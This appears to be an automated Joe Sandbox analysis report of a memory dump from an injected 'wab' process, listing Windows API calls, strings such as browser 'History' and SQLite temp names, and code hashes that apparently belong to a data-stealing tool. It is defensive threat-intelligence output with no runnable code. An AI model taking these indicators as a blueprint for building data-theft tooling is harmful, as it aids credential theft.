                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 265355444-0
                                                                                                                                                                                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1973883786-0
                                                                                                                                                                                                          • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004185FC
• GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
• ??3@YAXPAX@Z.MSVCRT ref: 00418650
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@AttributesFilememset
• String ID:
• API String ID: 776155459-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• ??3@YAXPAX@Z.MSVCRT ref: 00417544
• ??3@YAXPAX@Z.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@ByteCharMultiWide$ApisFilemalloc
• String ID:
• API String ID: 2308052813-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
• ??3@YAXPAX@Z.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: PathTemp$??3@
• String ID: %s\etilqs_$etilqs_
• API String ID: 1589464350-1420421710
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040FDD5
  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 0040FE1F
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 1775345501-2769808009
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcscpy.MSVCRT ref: 0041477F
• wcscpy.MSVCRT ref: 0041479A
• CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
• CloseHandle.KERNEL32(00000000), ref: 004147C8
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• API String ID: 999786162-26480598
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
                                                                                                                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID:
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
• Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
• Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
• unknown column "%s" in foreign key definition, xrefs: 00431858
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
• Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
• Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
• ??3@YAXPAX@Z.MSVCRT ref: 0040E961
• ??3@YAXPAX@Z.MSVCRT ref: 0040E974
• ??3@YAXPAX@Z.MSVCRT ref: 0040E987
• ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
• ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
• Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
• Opcode Fuzzy Hash: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
• Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
Uniqueness
Uniqueness Score: -1.00%

APIs
• AreFileApisANSI.KERNEL32 ref: 00417497
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
• malloc.MSVCRT ref: 004174BD
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
• ??3@YAXPAX@Z.MSVCRT ref: 004174E4
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide$??3@ApisFilemalloc
• String ID:
• API String ID: 2903831945-0
• Opcode ID: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
• Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
• Opcode Fuzzy Hash: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
• Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetParent.USER32(?), ref: 0040D453
• GetWindowRect.USER32(?,?), ref: 0040D460
• GetClientRect.USER32(00000000,?), ref: 0040D46B
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
• Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
• ??2@YAPAXI@Z.MSVCRT ref: 004450BE
• memset.MSVCRT ref: 004450CD
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• ??3@YAXPAX@Z.MSVCRT ref: 004450F0
  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• wcscpy.MSVCRT ref: 0044475F
• wcscat.MSVCRT ref: 0044476E
• wcscat.MSVCRT ref: 0044477F
• wcscat.MSVCRT ref: 0044478E
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 102104167-2245444037
• Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
• Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
• Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
• Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
• Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
• Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
• Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$??3@
• String ID: g4@
• API String ID: 3314356048-2133833424
• Opcode ID: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
• Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
• Opcode Fuzzy Hash: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
• Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _memicmpwcslen
• String ID: @@@@$History
• API String ID: 1872909662-685208920
• Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
• Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
• Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
• Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
• Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
• Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
• Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
• Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
• Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
• Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
• Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
• Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                                                                                                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                                                                                                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
